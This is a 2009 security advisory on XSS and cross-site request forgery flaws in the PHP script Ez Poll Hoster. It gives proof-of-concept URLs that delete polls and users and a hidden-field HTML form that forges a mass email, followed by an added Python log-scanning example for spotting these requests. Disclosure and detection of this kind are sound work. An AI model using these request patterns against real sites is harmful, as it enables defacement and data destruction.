Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities

2009.12.25
Risk: Medium
Local: No
Remote: Yes

[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Poll Hoster
[#] Version: the only one there is
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206
[#] Price: 15 USD
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--User panel
 |  |--XSS in user panel
 |  |--Delete poll by name
 |
 |--Admin panel
    |--XSS in admin panel
    |--Delete user by name
    |--Email all users

[#]User panel

[-]XSS in user panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=code&pid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete poll by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=delete_poll&pid=[POLL NAME]&do=true&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[#]Admin panel

[-]XSS in admin panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/profile.php?action=view&uid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete user by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER NAME]&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[-]Email all users

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/eph/admin.php?action=email&do=true" method="post">
  <input type="hidden" name="subject" value="this is my subject">
  <input type="hidden" name="message" value="this is my message">
  <input type="submit" name="submit" value="Submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#] EOF

References:

http://www.vupen.com/english/advisories/2009/3529
http://www.exploit-db.com/exploits/10439
http://secunia.com/advisories/37716
http://packetstormsecurity.org/0912-exploits/ezpollhoster-xssxsrf.txt
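
A log check for the request patterns listed in the advisory, as an added example that is not part of the original advisory or of the Ez Poll Hoster code. It assumes Apache combined log format and a site host of polls.example; the sample lines, label names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Dec/2009:10:00:01 +0100] "GET /eph/index.php?action=code&pid=poll1 HTTP/1.1" 200 512 "http://polls.example/eph/index.php" "UA"',
    '192.0.2.11 - - [14/Dec/2009:10:00:02 +0100] "GET /eph/index.php?action=code&pid=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 530 "-" "UA"',
    '192.0.2.12 - - [14/Dec/2009:10:00:03 +0100] "GET /eph/index.php?action=delete_poll&pid=poll1&do=true&is_js_confirmed=1 HTTP/1.1" 200 300 "http://other.example/page.html" "UA"',
    '192.0.2.13 - - [14/Dec/2009:10:00:04 +0100] "POST /eph/admin.php?action=email&do=true HTTP/1.1" 200 300 "http://polls.example/eph/admin.php?action=email" "UA"',
]

# Request line and Referer field of a combined-format entry.
LINE_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')
# (script, action) -> value of "do" that triggers the state change, per the advisory's URLs.
STATE_CHANGING = {
    ("index.php", "delete_poll"): "true",
    ("admin.php", "manage"): "delete",
    ("admin.php", "email"): "true",
}
# (script, action) -> parameter the advisory reports as an XSS sink.
REFLECTED = {("index.php", "code"): "pid", ("profile.php", "view"): "uid"}
MARKUP = re.compile(r'[<>"\']')


def classify(line, site_host):
    """Return labels (names are this example's own) for one log line."""
    m = LINE_RE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    # parse_qs percent-decodes values, so %3C is seen as "<".
    q = {k: v[0] for k, v in parse_qs(url.query).items()}
    key = (url.path.rsplit("/", 1)[-1], q.get("action", ""))
    findings = []
    param = REFLECTED.get(key)
    if param and MARKUP.search(q.get(param, "")):
        findings.append("markup-in-" + param)
    want = STATE_CHANGING.get(key)
    # A missing Referer ("-") has no hostname and is flagged for review as well.
    if want and q.get("do") == want and urlsplit(m["referer"]).hostname != site_host:
        findings.append("state-change-off-site-referer")
    return findings


def scan(lines, site_host):
    """Return (index, labels) for every line that produced at least one label."""
    hits = [(i, classify(line, site_host)) for i, line in enumerate(lines)]
    return [(i, labels) for i, labels in hits if labels]
```

Browsers and proxies can strip the Referer header, so these labels are leads for review rather than proof; the underlying fix is per-request anti-CSRF tokens on the state-changing actions and output encoding of `pid` and `uid`.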

